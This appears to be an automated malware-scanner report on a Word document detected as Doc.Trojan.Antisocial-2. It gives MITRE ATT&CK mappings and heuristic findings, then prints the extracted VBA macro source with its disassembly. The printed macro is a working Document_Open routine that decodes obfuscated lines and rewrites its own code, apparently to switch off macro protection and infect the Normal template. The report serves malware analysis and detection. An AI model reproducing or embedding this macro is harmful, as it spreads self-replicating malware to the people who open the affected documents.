MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious documents. The macro code is heavily obfuscated, making it difficult to determine the exact payload, but it is designed to execute arbitrary code. This suggests the document is a malicious attachment intended to deliver a secondary stage malware.
Heuristics 3
-
ClamAV: Doc.Trojan.Antisocial-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Antisocial-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4656 bytes |
SHA-256: 2554fed459dbb7867468640550d1644817bece7964834677eeb6a29e0ea3f930 |
|||
|
Detection
ClamAV:
Doc.Trojan.Antisocial-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open(): Application.EnableCancelKey = wdCancelDisabled
For d = 6 To ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: C$ = ""
I = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(d, 1))
f = (Mid(I, 2, 1)): For X = 3 To Len(I): B$ = Asc(Mid(I, X, 1)) - f: C$ = C$ & Chr(B$): Next X: A = C$
ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine d, A: Next d: End Sub
'6Vxo|gzk&Y{h&Jui{sktzeIruyk./@&Uvzouty4Yg|kTuxsgrVxusvz&C&6
'5Tuyntsx3HtsknwrHts{jwxntsx%B%5?%Tuyntsx3[nwzxUwtyjhynts%B%5
'5Xjy%HR%B%YmnxIthzrjsy3[GUwtojhy3[GHtrutsjsyx3Nyjr-6.3HtijRtizqj
'3Vhw#DG#@#DfwlyhGrfxphqw1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh
'3Vhw#QW#@#QrupdoWhpsodwh1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh
'7Mvy'k'D'='[v'JT5Jv|u{VmSpulzA'J+'D'))A'P'D'/JT5Spulz/k3'800
'1g!>!Jou)Soe!+!9*!,!2;!Gps!Y!>!2!Up!Mfo)J*;!C%!>!Btd)Nje)J-!Y-!2**!,!g;!D%!>!D%!'!Dis)C%*;!Ofyu!Y;!B!>!D%
'7[opzKvj|tlu{5]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl5YlwshjlSpul'k3').)'-'m'-'HA'Ul {'k
'7TJ'D'JT5Spulz/83'JT5Jv|u{VmSpulz0
'6GJ4JkrkzkRotky&72&GJ4Iu{tzUlRotky@&GJ4GjjLxusYzxotm&SI
'1OU/EfmfufMjoft!2-!OU/DpvouPgMjoft;!OU/BeeGspnTusjoh!ND
'4EgxmziHsgyqirx2WeziEw$JmpiReqi>AEgxmziHsgyqirx2JyppReqi>$Irh$Wyf
'7.[ol'Kltvyhsp�h{pvu'Vm'[ol'Kltlhu
'7.[l|mspzjo']vu'S€z'Rv}pjR
' Processing file: /opt/analyzer/scan_staging/b0938e1c96f242e580b132dd1aaae66c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 13703 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' BoS 0x0000
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #1:
' StartForVariable
' Ld d
' EndForVariable
' LitDI2 0x0006
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' For
' BoS 0x0000
' LitStr 0x0000 ""
' St C$
' Line #2:
' Ld d
' LitDI2 0x0001
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' Paren
' St I
' Line #3:
' Ld I
' LitDI2 0x0002
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' Paren
' St False
' BoS 0x0000
' StartForVariable
' Ld X
' EndForVariable
' LitDI2 0x0003
' Ld I
' FnLen
' For
' BoS 0x0000
' Ld I
' Ld X
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' ArgsLd Asc 0x0001
' Ld False
' Sub
' St B$
' BoS 0x0000
' Ld C$
' Ld B$
' ArgsLd Chr 0x0001
' Concat
' St C$
' BoS 0x0000
' StartForVariable
' Ld X
' EndForVariable
' NextVar
' BoS 0x0000
' Ld C$
' St A
' Line #4:
' Ld d
' Ld A
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemCall ReplaceLine 0x0002
' BoS 0x0000
' StartForVariable
' Ld d
' EndForVariable
' NextVar
' BoS 0x0000
' EndSub
' Line #5:
' QuoteRem 0x0000 0x003B "6Vxo|gzk&Y{h&Jui{sktzeIruyk./@&Uvzouty4Yg|kTuxsgrVxusvz&C&6"
' Line #6:
' QuoteRem 0x0000 0x003C "5Tuyntsx3HtsknwrHts{jwxntsx%B%5?%Tuyntsx3[nwzxUwtyjhynts%B%5"
' Line #7:
' QuoteRem 0x0000 0x0040 "5Xjy%HR%B%YmnxIthzrjsy3[GUwtojhy3[GHtrutsjsyx3Nyjr-6.3HtijRtizqj"
' Line #8:
' QuoteRem 0x0000 0x0042 "3Vhw#DG#@#DfwlyhGrfxphqw1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh"
' Line #9:
' QuoteRem 0x0000 0x0042 "3Vhw#QW#@#QrupdoWhpsodwh1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh"
' Line #10:
' QuoteRem 0x0000 0x003C "7Mvy'k'D'='[v'JT5Jv|u{VmSpulzA'J+'D'))A'P'D'/JT5Spulz/k3'800"
' Line #11:
' QuoteRem 0x0000 0x0069 "1g!>!Jou)Soe!+!9*!,!2;!Gps!Y!>!2!Up!Mfo)J*;!C%!>!Btd)Nje)J-!Y-!2**!,!g;!D%!>!D%!'!Dis)C%*;!Ofyu!Y;!B!>!D%"
' Line #12:
' QuoteRem 0x0000 0x005A "7[opzKvj|tlu{5]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl5
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.